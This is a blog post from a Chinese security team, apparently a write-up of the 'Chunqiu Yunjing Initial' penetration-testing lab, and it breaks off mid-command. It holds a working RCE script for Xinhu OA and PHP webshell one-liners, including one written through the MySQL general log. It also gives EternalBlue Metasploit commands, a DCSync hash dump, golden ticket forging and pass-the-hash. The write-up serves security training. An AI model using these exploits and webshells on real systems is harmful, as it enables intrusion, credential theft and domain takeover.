<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 5.4.2">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerone-32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerone-16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="msvalidate.01" content="237E6FD4C952815B9A0DDB67FAB1FF12">
  <meta name="baidu-site-verification" content="code-LhZrqnckkC">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"r30blogs.com","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.12.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="flag1进入之后是一个远控登录界面 这里用nmap扫描了一下看了一看端口开放情况，然后fscan扫一扫，有意外收获，fscan给出其框架是tp5 且存在漏洞，所以直接上工具一把梭哈  提权1sudo -l  查看特权文件  发现mysql具有root权限这里查一手mysql如何提权（https:&#x2F;&#x2F;gtfobins.github.io&#x2F;） 之后读取&#x2F;root下的flag  代理搭建这里">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云镜 Initial">
<meta property="og:url" content="https://r30blogs.com/2023/08/23/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Initial/index.html">
<meta property="og:site_name" content="R3ape1团队笔记">
<meta property="og:description" content="flag1进入之后是一个远控登录界面 这里用nmap扫描了一下看了一看端口开放情况，然后fscan扫一扫，有意外收获，fscan给出其框架是tp5 且存在漏洞，所以直接上工具一把梭哈  提权1sudo -l  查看特权文件  发现mysql具有root权限这里查一手mysql如何提权（https:&#x2F;&#x2F;gtfobins.github.io&#x2F;） 之后读取&#x2F;root下的flag  代理搭建这里">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048601.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048624.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048632.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048642.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048655.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048659.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048619.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048636.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048655.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048686.png">
<meta property="og:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048716.png">
<meta property="article:published_time" content="2023-08-23T12:50:00.000Z">
<meta property="article:modified_time" content="2023-08-23T12:49:07.703Z">
<meta property="article:author" content="nnnpc、commit、Eureka">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048601.png">


<link rel="canonical" href="https://r30blogs.com/2023/08/23/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Initial/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://r30blogs.com/2023/08/23/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Initial/","path":"2023/08/23/春秋云镜 Initial/","title":"春秋云镜 Initial"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>春秋云镜 Initial | R3ape1团队笔记</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">R3ape1团队笔记</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">杭电信工笃行楼230实验室</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#flag1"><span class="nav-number">1.</span> <span class="nav-text">flag1</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">1.1.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%A3%E7%90%86%E6%90%AD%E5%BB%BA"><span class="nav-number">1.2.</span> <span class="nav-text">代理搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E5%B0%8F%E6%8F%92%E6%9B%B2%E4%B9%8Bcs%E5%92%8Cmsf"><span class="nav-number">1.2.1.</span> <span class="nav-text">小插曲之cs和msf</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#Neo-reGeorg"><span class="nav-number">1.2.2.</span> <span class="nav-text">Neo-reGeorg</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.3.</span> <span class="nav-text">信息收集</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#flag2"><span class="nav-number">2.</span> <span class="nav-text">flag2</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#plan-A"><span class="nav-number">2.1.</span> <span class="nav-text">plan A</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#plan-B"><span class="nav-number">2.2.</span> <span class="nav-text">plan B</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#flag3"><span class="nav-number">3.</span> <span class="nav-text">flag3</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#ms17010"><span class="nav-number">3.1.</span> <span class="nav-text">ms17010</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="nav-number">3.2.</span> <span class="nav-text">横向移动</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="nnnpc、commit、Eureka"
      src="/images/head.png">
  <p class="site-author-name" itemprop="name">nnnpc、commit、Eureka</p>
  <div class="site-description" itemprop="description">网络信息安全，责任重大，使命光荣。</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:1695672857@qq.com" title="E-Mail → mailto:1695672857@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://r30blogs.com/2023/08/23/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Initial/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.png">
      <meta itemprop="name" content="nnnpc、commit、Eureka">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="R3ape1团队笔记">
      <meta itemprop="description" content="网络信息安全，责任重大，使命光荣。">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="春秋云镜 Initial | R3ape1团队笔记">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          春秋云镜 Initial
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-08-23 20:50:00 / 修改时间：20:49:07" itemprop="dateCreated datePublished" datetime="2023-08-23T20:50:00+08:00">2023-08-23</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E7%AC%94%E8%AE%B0/web%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">web笔记</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h4 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h4><p>进入之后是一个远控登录界面</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048601.png" alt="image-20230819220629394">这里用nmap扫描了一下看了一看端口开放情况，然后fscan扫一扫，有意外收获，fscan给出其框架是tp5</p>
<p>且存在漏洞，所以直接上工具一把梭哈</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048624.png" alt="image-20230819214623336"></p>
<h5 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h5><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo -l</span><br></pre></td></tr></table></figure>

<p>查看特权文件</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048632.png" alt="image-20230819214739201"></p>
<p>发现mysql具有root权限这里查一手mysql如何提权（<a target="_blank" rel="noopener" href="https://gtfobins.github.io/%EF%BC%89">https://gtfobins.github.io/）</a></p>
<p>之后读取&#x2F;root下的flag</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048642.png" alt="image-20230819215031945"></p>
<h5 id="代理搭建"><a href="#代理搭建" class="headerlink" title="代理搭建"></a>代理搭建</h5><p>这里我用的是Neo-reGeorg和Proxifier，和proxychains</p>
<p>因为一些原因所以希望速度快些但是发现打靶机这事急不来，在操做的时候遇到了很多的玄学问题，靶机的环境一直很卡，再加上我的网络开始的时候也不是很好所以前面的时我一直处于疯狂看报错的状态；</p>
<h6 id="小插曲之cs和msf"><a href="#小插曲之cs和msf" class="headerlink" title="小插曲之cs和msf"></a>小插曲之cs和msf</h6><p>因为是内网所以最开始的时候我很想用cs但是把linux主机上线后发现，我的插件和对插件的理解都不是很多所以最后放弃了</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048655.png" alt="image-20230819221601795"></p>
<p>在解决报错的时候五一看到了另一个师傅的文章，师傅在拿下主机后就利用msf生成木马上线，利用msf的自生模块获取路由和做代理，感觉很流畅，有兴趣的师傅可以看一下：</p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12115">记一次春秋云镜域渗透靶场Initial - 先知社区 (aliyun.com)</a></p>
<h6 id="Neo-reGeorg"><a href="#Neo-reGeorg" class="headerlink" title="Neo-reGeorg"></a>Neo-reGeorg</h6><p>生成对应文件及密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 neoreg.py generate -k commit</span><br></pre></td></tr></table></figure>

<p>将生成的文件上至目标靶机</p>
<h5 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h5><p>这里成功拿下第一台主机之后进行信息收集，发现存在<code>172.22.1.*</code>，利用fscan进行扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">start infoscan</span><br><span class="line">已完成 0/0 listen ip4:icmp 0.0.0.0: socket: operation not permitted</span><br><span class="line">trying RunIcmp2</span><br><span class="line">The current user permissions unable to send icmp packets</span><br><span class="line">start ping</span><br><span class="line">(icmp) Target 172.22.1.2      is alive</span><br><span class="line">(icmp) Target 172.22.1.15     is alive</span><br><span class="line">(icmp) Target 172.22.1.21     is alive</span><br><span class="line">(icmp) Target 172.22.1.18     is alive</span><br><span class="line">[*] Icmp alive hosts len is: 4</span><br><span class="line">172.22.1.18:3306 open</span><br><span class="line">172.22.1.18:445 open</span><br><span class="line">172.22.1.21:445 open</span><br><span class="line">172.22.1.2:445 open</span><br><span class="line">172.22.1.18:139 open</span><br><span class="line">172.22.1.21:139 open</span><br><span class="line">172.22.1.2:139 open</span><br><span class="line">172.22.1.18:135 open</span><br><span class="line">172.22.1.21:135 open</span><br><span class="line">172.22.1.15:22 open</span><br><span class="line">172.22.1.2:135 open</span><br><span class="line">172.22.1.18:80 open</span><br><span class="line">172.22.1.2:88 open</span><br><span class="line">172.22.1.15:80 open</span><br><span class="line">[*] alive ports len is: 14</span><br><span class="line">start vulscan</span><br><span class="line">[*] WebTitle:http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin</span><br><span class="line">[+] NetInfo:</span><br><span class="line">[*]172.22.1.21</span><br><span class="line">   [-&gt;]XIAORANG-WIN7</span><br><span class="line">   [-&gt;]172.22.1.21</span><br><span class="line">[+] NetInfo:</span><br><span class="line">[*]172.22.1.2</span><br><span class="line">   [-&gt;]DC01</span><br><span class="line">   [-&gt;]172.22.1.2</span><br><span class="line">[+] NetInfo:</span><br><span class="line">[*]172.22.1.18</span><br><span class="line">   [-&gt;]XIAORANG-OA01</span><br><span class="line">   [-&gt;]172.22.1.18</span><br><span class="line">[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)</span><br><span class="line">[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)</span><br><span class="line">[*] 172.22.1.2     [+]DC XIAORANG\DC01              Windows Server 2016 Datacenter 14393</span><br><span class="line">[*] 172.22.1.21          XIAORANG\XIAORANG-WIN7     Windows Server 2008 R2 Enterprise 7601 Service Pack 1</span><br><span class="line">[*] WebTitle:http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login</span><br><span class="line">[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统</span><br><span class="line">[*] 172.22.1.18          XIAORANG\XIAORANG-OA01     Windows Server 2012 R2 Datacenter 9600</span><br><span class="line">[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1</span><br><span class="line">已完成 14/14</span><br><span class="line">[*] 扫描结束,耗时: 21.273785652s</span><br></pre></td></tr></table></figure>

<p>信息量还是比较大的，我们发现内网中几台其余存活的主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">172.22.1.2        DC</span><br><span class="line">172.22.1.18       存在web服务</span><br><span class="line">172.22.1.21       存在永痕之蓝漏洞</span><br></pre></td></tr></table></figure>

<h4 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h4><h5 id="plan-A"><a href="#plan-A" class="headerlink" title="plan A"></a>plan A</h5><p>根据以上信息就先<code>172.22.1.18</code>下手</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048659.png" alt="image-20230819215836670"></p>
<p>它存在这样一个OA，并且版本信息啥的都有，先弱口令试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">admin</span><br><span class="line">admin123</span><br></pre></td></tr></table></figure>

<p>这个OA的版本信息都有，所以在网上搜索一下，该OA存在rce漏洞，这里用一下大师傅们的脚本</p>
<p>脚本出处：<a target="_blank" rel="noopener" href="https://blog.csdn.net/solitudi/article/details/118675321">https://blog.csdn.net/solitudi/article/details/118675321</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">session = requests.session()</span><br><span class="line"></span><br><span class="line">url_pre = <span class="string">&#x27;http://172.22.1.18/&#x27;</span></span><br><span class="line">url1 = url_pre + <span class="string">&#x27;?a=check&amp;m=login&amp;d=&amp;ajaxbool=true&amp;rnd=533953&#x27;</span></span><br><span class="line">url2 = url_pre + <span class="string">&#x27;/index.php?a=upfile&amp;m=upload&amp;d=public&amp;maxsize=100&amp;ajaxbool=true&amp;rnd=798913&#x27;</span></span><br><span class="line">url3 = url_pre + <span class="string">&#x27;/task.php?m=qcloudCos|runt&amp;a=run&amp;fileid=11&#x27;</span></span><br><span class="line"></span><br><span class="line">data1 = &#123;</span><br><span class="line">    <span class="string">&#x27;rempass&#x27;</span>: <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;jmpass&#x27;</span>: <span class="string">&#x27;false&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;device&#x27;</span>: <span class="string">&#x27;1625884034525&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;ltype&#x27;</span>: <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;adminuser&#x27;</span>: <span class="string">&#x27;YWRtaW4=&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;adminpass&#x27;</span>: <span class="string">&#x27;YWRtaW4xMjM=&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;yanzm&#x27;</span>: <span class="string">&#x27;&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r = session.post(url1, data=data1)</span><br><span class="line">r = session.post(url2, files=&#123;<span class="string">&#x27;file&#x27;</span>: <span class="built_in">open</span>(<span class="string">&#x27;1.php&#x27;</span>, <span class="string">&#x27;r+&#x27;</span>)&#125;)</span><br><span class="line"></span><br><span class="line">filepath = <span class="built_in">str</span>(r.json()[<span class="string">&#x27;filepath&#x27;</span>])</span><br><span class="line">filepath = <span class="string">&quot;/&quot;</span> + filepath.split(<span class="string">&#x27;.uptemp&#x27;</span>)[<span class="number">0</span>] + <span class="string">&#x27;.php&#x27;</span></span><br><span class="line"><span class="built_in">id</span> = r.json()[<span class="string">&#x27;id&#x27;</span>]</span><br><span class="line"></span><br><span class="line">url3 = url_pre + <span class="string">f&#x27;/task.php?m=qcloudCos|runt&amp;a=run&amp;fileid=<span class="subst">&#123;<span class="built_in">id</span>&#125;</span>&#x27;</span></span><br><span class="line"></span><br><span class="line">r = session.get(url3)</span><br><span class="line">r = session.get(url_pre + filepath + <span class="string">&quot;?1=system(&#x27;dir&#x27;);&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>

<p>我们需要在该脚本同目录下创建一个1.php其中内容为一句话木马即可<code>&lt;?php eval($_GET[&quot;1&quot;]);?&gt;</code>;</p>
<p>到这一切都顺利接着种马成功之后环境就开始抽象起来了，我的蚁剑怎么设置都连不上（后面重置靶机就ok了，可能开始钱没充够吧）;</p>
<h5 id="plan-B"><a href="#plan-B" class="headerlink" title="plan B"></a>plan B</h5><p>这个时候又看到了另一个师傅的文章，发现这台主机的突破点并不只有这一个，其phpmyadmin暴露，且弱口令<code>root/root</code>就可以登录，这时候可以通过mysql写马的方式来getshell;</p>
<p>查看是否开启日志以及存放的日志位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like &#x27;general%&#x27;;</span><br></pre></td></tr></table></figure>

<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048619.png" alt="image-20230819223201773"></p>
<p>开启日志</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log = ON;</span><br></pre></td></tr></table></figure>

<p>设置日志保存位置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set global general_log_file=&quot;C:/phpStudy/PHPTutorial/WWW/shell.php&quot;;</span><br></pre></td></tr></table></figure>

<p>写入木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#x27;&lt;?php eval($_POST[cmd]);?&gt;&#x27;;</span><br></pre></td></tr></table></figure>

<p>之后进行蚁剑连接，成功获取flag</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048636.png" alt="image-20230819223415581"></p>
<h4 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h4><h5 id="ms17010"><a href="#ms17010" class="headerlink" title="ms17010"></a>ms17010</h5><p>linux中设置代理<code>vim /etc/proxychains4.conf</code>;</p>
<p>我们利用msf的攻击模块进行操作</p>
<p>先上命令（这里有个需要注意的细节，就是我们应该进行正向连接，内网主机大多数情况下是不出网的或其出站协议是受到限制的）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">proxychains msfconsole</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue</span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp_uuid</span><br><span class="line">set RHOSTS 172.22.1.21</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>我愿称它为搞人心态的MVP，在这里我的代理开始抽象了起来</p>
<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048655.png" alt="image-20230819223845776"></p>
<p>然后问了一下gpt它说可能是端口的问题，然后我就连换了几个，发现还是不行我的msf到最后一步的时候就显示连接超时，最后我准备再次重置的时候<code>sessions</code>了一下发现有成功上线的，之后就开始了一步三报错的路子继续了下去；</p>
<h5 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h5><p>这里用的是DCSync进行横移</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/286137.html">内网渗透测试：DCSync 攻击技术的利用 - FreeBuf网络安全行业门户</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">load kiwi</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">导出域内用户的<span class="built_in">hash</span></span></span><br><span class="line">kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv</span><br></pre></td></tr></table></figure>

<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048686.png" alt="image-20230819224519688"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">生成黄金票据</span></span><br><span class="line">kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">导入黄金票据</span></span><br><span class="line">kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">wmi <span class="built_in">hash</span>传递</span></span><br><span class="line">python ./wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 